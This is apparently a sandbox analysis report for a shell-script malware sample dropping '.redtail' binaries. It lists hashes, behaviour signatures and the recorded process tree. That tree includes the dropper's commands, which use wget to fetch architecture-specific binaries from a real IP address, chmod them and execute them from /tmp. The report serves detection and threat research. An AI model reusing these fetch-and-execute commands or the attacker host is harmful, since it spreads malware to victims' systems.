Analysis
-
max time kernel
33s -
max time network
34s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25-11-2024 16:32
Static task
static1
Behavioral task
behavioral1
Sample
sh.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
sh.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
sh.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
sh.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
sh.sh
-
Size
1KB
-
MD5
76d58f7849b2fde18b37f09ced7607de
-
SHA1
f5f9858f1b5906c33462ec4b85f5cbcac849ad11
-
SHA256
3501a9f19a8d7e324f23b303a25ff0fb4ea93709f0b620820939fd863d7a9fd6
-
SHA512
9f1f1047c901b0197e81e76e4eb34931ab2b457990a3d351ab4423bcbbb5c2da4c84bb138947533b41d11711f12c950698ea191892d3f0dde1b4a0fb1988e9af
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid process 749 chmod 771 chmod 797 chmod 812 chmod -
Executes dropped EXE 4 IoCs
Processes:
.redtail.redtail.redtail.redtailioc pid process /tmp/.redtail 751 .redtail /tmp/.redtail 773 .redtail /tmp/.redtail 799 .redtail /tmp/.redtail 813 .redtail -
Processes:
resource yara_rule /tmp/x86_64 upx /tmp/i686 upx /tmp/aarch64 upx /tmp/arm7 upx -
Processes:
catawkfinddescription ioc process File opened for reading /proc/mounts cat File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems find -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetsh.shdescription ioc process File opened for modification /tmp/i686 wget File opened for modification /tmp/aarch64 wget File opened for modification /tmp/arm7 wget File opened for modification /tmp/x86_64 wget File opened for modification /tmp/.redtail sh.sh
Processes
-
/tmp/sh.sh/tmp/sh.sh1⤵
- Writes file to tmp directory
PID:695 -
/bin/catcat /proc/mounts2⤵
- Reads runtime system information
PID:700
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
PID:702
-
-
/bin/grepgrep noexec2⤵PID:701
-
-
/usr/bin/whoamiwhoami2⤵PID:712
-
-
/usr/bin/findfind / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*"2⤵
- Reads runtime system information
PID:715
-
-
/bin/unameuname -mp2⤵PID:734
-
-
/bin/grepgrep -q x86_642⤵PID:736
-
-
/bin/grepgrep -q amd642⤵PID:738
-
-
/bin/grepgrep -q "i[3456]86"2⤵PID:740
-
-
/bin/grepgrep -q armv82⤵PID:742
-
-
/bin/grepgrep -q aarch642⤵PID:744
-
-
/bin/grepgrep -q armv72⤵PID:746
-
-
/usr/bin/wgetwget http://45.202.35.190/x86_642⤵
- Writes file to tmp directory
PID:747
-
-
/bin/catcat x86_642⤵PID:748
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/.redtail./.redtail2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://45.202.35.190/i6862⤵
- Writes file to tmp directory
PID:754
-
-
/bin/catcat i6862⤵PID:769
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/.redtail./.redtail2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://45.202.35.190/aarch642⤵
- Writes file to tmp directory
PID:775
-
-
/bin/catcat aarch642⤵PID:795
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/.redtail./.redtail2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://45.202.35.190/arm72⤵
- Writes file to tmp directory
PID:802
-
-
/bin/catcat arm72⤵PID:811
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/.redtail./.redtail2⤵
- Executes dropped EXE
PID:813
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD5322095f828345179dc422bcf65db4b61
SHA1c244dce124772e0d94a01b3bc0d5d005614101b2
SHA256992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472
SHA512c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70
-
Filesize
1.1MB
MD5045daa66263bfd467051c013e9222faf
SHA14b943b14526d7bf7be2b3e3f9af24d1f35015548
SHA256d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4
SHA512bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f
-
Filesize
1.5MB
MD501fc359f540fca7f496b5c4841c67f7e
SHA14689b4afff6f08b8c9e781d07c3a782823a6689f
SHA25669dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586
SHA5124d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc
-
Filesize
1.6MB
MD5f6634e2fb7872be767a2cb5b1da04103
SHA1532037729f2da9fc1341f744e5afa2420bcfebca
SHA25629f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b
SHA512e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51